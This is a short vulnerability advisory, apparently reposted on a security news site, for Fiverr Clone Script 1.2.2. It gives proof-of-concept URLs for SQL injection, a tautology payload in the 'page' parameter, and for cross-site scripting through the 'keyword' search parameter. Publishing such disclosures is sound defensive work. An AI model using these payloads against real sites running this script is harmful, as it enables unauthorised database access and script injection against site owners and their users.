Exploit/Advisories

Published on April 1st, 2019 📆 | 8304 Views ⚑

0

Fiverr Clone Script 1.2.2 Cross Site Scripting / SQL Injection


Text to Speech Demo

Fiverr Clone Script version 1.2.2 suffers from cross site scripting and remote SQL injection vulnerabilities.

MD5 | aa633fc8b896ed59cd8c18665450b533

# Exploit Title: Fiverr Clone Script 1.2.2 - SQL Injection / Cross Site Scripting
# Exploit Author: Mr Winst0n
# Author E-mail: [email protected]
# Discovery Date: Apr 1, 2019
# Vendor Homepage: https://www.phpscriptsmall.com
# Software Link : https://www.phpscriptsmall.com/product/fiverr-clone-script/
# Tested Version: 1.2.2
# Tested on: Kali linux, Windows 8.1 
# PoC:














# http://localhost/?page=[SQLi]
# http://localhost/search-results.php?category=[Category id]&subcategory=[Subcategory id]&keyword=[XSS]
# http://localhost/?page=2%20%27%20OR%201%20=%201%20--
# http://localhost/search-results.php?category=32&subcategory=63&keyword=alert(1)&project_search=#

(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = "http://connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.8&appId=409115965821184";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));

Tagged with:



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑